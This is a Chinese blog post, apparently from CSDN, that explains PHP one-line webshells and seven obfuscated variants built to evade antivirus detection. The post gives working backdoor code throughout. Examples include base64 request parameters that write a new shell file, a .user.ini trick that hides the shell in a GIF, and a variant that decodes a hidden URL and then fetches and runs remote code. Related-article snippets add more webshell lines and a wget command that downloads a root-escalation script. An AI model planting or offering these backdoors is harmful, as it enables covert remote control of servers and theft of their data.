php一句话利用,常见php一句话webshell解析

最新推荐文章于 2024-04-17 06:30:00 发布
最新推荐文章于 2024-04-17 06:30:00 发布
阅读量4.8k 收藏 1
点赞数 2
文章标签: php一句话利用

我理解的 webshell 是在服务器上以 web server application (比如apache,iis或者nginx)的权限进行远程任意代码执行的工具。当然通过一些手段也可能可以进行提权。

最基础的 php webshell1<?php eval($_POST[CMD]);?>

将 post 请求中的 CMD 参数直接执行。

1<?php eval($_GET[CMD]);?>

原理浅析:

1、在PHP脚本语言中,eval(code)的功能是将code组合成php指令,然后将指令执行。

2、<?php $a=”phpinfo()”; eval(“echo $a; “); ?>

就相当于执行 echo phpinfo()语句。

变形一

为了与各种静态分析检测的杀毒软件进行对抗,webshell的代码也在不断进行混淆和改进。

1<?php $x=$_GET['z']; @eval("$x;");?>

一般的安全软件可能会将eval+GET或POST判定为后门程序,因此这种变形将eval和GET或者POST分开,能够绕过这种情况。

变形二

接收方

感觉这里并没有写对,应该是传入的两个参数都是base64加密的,经过解密后再执行,生成后门文件。

1

2

3<?php

$a=str_replace(x,"","axsxxsxexrxxt");$a($_POST["code"]);

?>

请求参数

1?code=fputs(fopen(base64_decode(J2MucGhwJw==),w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg=="))

还原出的命令

1assert(fputs(fopen('c.php',w),"<?php @eval($_POST[a]);?>"))

利用assert来执行命令,并且用字符串隐藏assert方法,并且利用它加上动态传入参数的方式构造后门。

变形三1

2

3<?php

$_GET['a']($_GET['b']);

?>

请求参数

1?a=assert&b=fputs(fopen(base64_decode(J2MucGhwJw==),w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg=="))

完全利用动态参数传入的方式构造后门,将敏感函数和执行的命令动态传入,效果与变形二是一致的。

变形四1($code = $_POST['code']) &&@preg_replace('/ad/e','@'.str_rot13('riny').'($code)', 'add')

改进的地方:

首先,将eval函数用str_rot13(‘riny’)隐藏。

然后,利用 e 修饰符,在preg_replace完成字符串替换后,使得引擎将结果字符串作为php代码使用eval方式进行评估并将返回值作为最终参与替换的字符串。

变形五1$filename=$_GET['code']; include ($filename);

改进的地方:

由于include方法可以直接编译任何格式的文件为php格式运行,因此可以上传一个txt格式的php文件,将真正的后门写在文本当中。

变形六1auto_prepend_file=code.gif

上传.user.ini,并且写入auto_prepend_file=code.gif

将一句话隐藏在code.gif中,并且将它上传到同一目录下。

改进的地方:

将一句话木马隐藏在图形文件中,并且利用用户配置文件将其自动加载到同目录的php文件下,使得所有正常php文件都毫不知情的中招。

变形七1

2if(empty($_SESSION['api']))$_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);

@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);

改进的地方:

第一,通过pack函数得到URL

第二,利用file_get_contents获得make.jpg。

第三,利用substr截取3649字节以后的内容。

第四,利用gzuncompress方法将3649字节以后的内容解压出来。

第五,用preg_replace方法的e操作符将代码执行。

还有很多后续操作……

后记

以上为了试验操作的方便,采用的是Get方式获取PHP的执行代码,但实际上,由于URL长度的限制,一般采用Post的方式。由于PHP版本的不断更新,因此一些旧的方法可能已经不太好用,但是随着版本的更新,相信也会有更多越来越新奇的mm慢慢浮出水面,让我们拭目以待。

另外除了这些一句话以外,还有一些不错的大马,例如rc-shell等,以及github上大量的webshell仓库。

参考资料

weixin_39606361
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP一句话 免杀版
10-23
PHP一句话 免杀版
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话webshell,然后用菜刀连接即可
最新php一句话
收集盒 Book box
10-28 792
第一种:1.php $_=@$_GET[2]).@$_($_GET[1])?> 在菜刀里写http://127.0.0.1/1.php?2=assert密码是1 第二种2.php $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> 在菜刀里写 http://127.
PHP一句话木马
最新发布
Code-5的博客
04-17 934
4. 上图中显示sql出错了,但是没有关系,我们可以在文件中看到attack.txt已经生成了。WebShell 是一种在 Web 服务器上运行的脚本或程序,可用于远程控制和管理服务器。保护 Web 服务器的安全对于确保网站和用户数据的安全至关重要。3. 利用文件导入的方式进行注入。
PHP一句话木马集合
闵行小鱼塘
05-21 1万+
whoam1(QQ:2069698797)大佬早些年做的PHP一句话木马集合,在此记录下
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3025
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
动手实现简易PHP一句话连接工具——FruitKnife
垃圾管理员的垃圾站
08-24 1430
文章目录效果展示连接一句话浏览服务器目录打开文件跳转目录上传文件前言设计思路与需求分析功能实现连接一句话浏览目录打开文件跳转路径上传文件节目清单不足之处工具名字的由来关于系列另外两个小工具简易版HTTP报文截获工具——CatcherExif信息编辑器——ExifEditor 效果展示 连接一句话 浏览服务器目录 打开文件 跳转目录 上传文件 前言 小工具由Python语言实现,虽然并不复杂,但是为了能够更好地理解以下内容,需要读者具有PHP语言基础(能看懂代码就行,不必具有开发能力),并在阅读本文
php注入一句话,总结的php注入语句
weixin_42629522的博客
03-26 590
2008年02月24日 星期日 22:291.判断是否存在注入,加';and 1=1;and 1=22.判断版本 and ord(mid(version(),1,1))>51 代替。5.判断数据库连接帐号有没有写权限,and (select count(*) frommysql.user)>0select1,concat(char(124,13,10),SCHEMA_NAME,char...
JSP一句话后门
10-31
JSP一句话后门 JSP一句话后门是指在Java Server Pages(JSP)中使用的一种后门技术,该技术允许攻击者在服务器上写入恶意文件,从而控制服务器的行为。 知识点1: JSP是什么? JSP全名为Java Server Pages,是一种...
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
一句话的艺术-web提权.pdf
01-25
然而,文章的重点在于,在已经获取到Webshell(即一句话木马)的前提下,如何在这些安全软件的监控下执行任意代码。 2. **技术细节** - **一句话木马**:这是一种小型、简洁的后门,通常以ASP、ASPX或PHP等语言...
meeidol-luo#WebShell#另类PHP一句话小马1
07-25
另类PHP一句话小马利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里
PHP文件包含与一句话木马实验代码
a2788656708的博客
12-03 2611
文件包含 1.新建phpinfo.php文件 2.用include语句包含phpinfo.php文件 3.浏览器访问 1.利用require 语句包含phpinfo.php文件 2.浏览器访问 一句话木马 ASSERT函数 1.利用assert函数创建get.php 2.浏览器访问 在url中 ip地址后输入 cmd=system("whoami"); 1.利用assert函数创建post.php 2.浏览器访问 在post data 栏 输入 ...
WebShell
热门推荐
高飞的博客
03-06 11万+
webshell
一句话木马@eval($_POST[“cmd“]);是什么意思(超详细)
qq_62708558的博客
02-20 1万+
再加上eval()方法函数将用户输入的字符串进行执行,那么用户便可以通过输入php语句来达到任意操作数据库和服务器的效果了
PHP木马
qq_41272376的博客
02-16 4435
PHP木马 一句话木马 可以在目标服务器上执行PHP代码,并和客户端(如菜刀,Cknife、冰蝎、蚁剑)进行交互的webshell,俗称小马。 多功能木马 根据PHP语法,编写较多代码,并在服务器上执行,完成所有功能的Webshell,俗称大马 逻辑木马 利用系统逻辑漏洞(如php uaf漏洞),绕过访问控制或执行特殊功能的WebShell PHP 可执行系统命令的函数 system string system ( string $command [, int &$return_var ] );
php 提权脚本 linux,linux 自动提权perl脚本
weixin_39518840的博客
04-02 540
使用demoyaseng@UAUC:~$ wget http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt -O root.plyaseng@UAUC:~$ perl root.plyaseng@UAUC#:help----------------------------------------------------...
PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
百彦子烨的博客
11-10 2万+
该文章对PHP一句话木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
php一句话获取webshell代码
a843538946的专栏
12-14 3381
&lt;?php @eval($_POST['chopper']);?&gt;
通过SELinux设置防止webshell.php一句话木马访问Linux服务器上nginx代理网站外的其他资源
06-11
可以通过SELinux设置防止webshell.php一句话木马访问Linux服务器上nginx代理网站外的其他资源,以下是具体步骤: 1. 确认SELinux状态:使用命令`getenforce`检查SELinux是否开启,如果输出`Enforcing`,则SELinux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值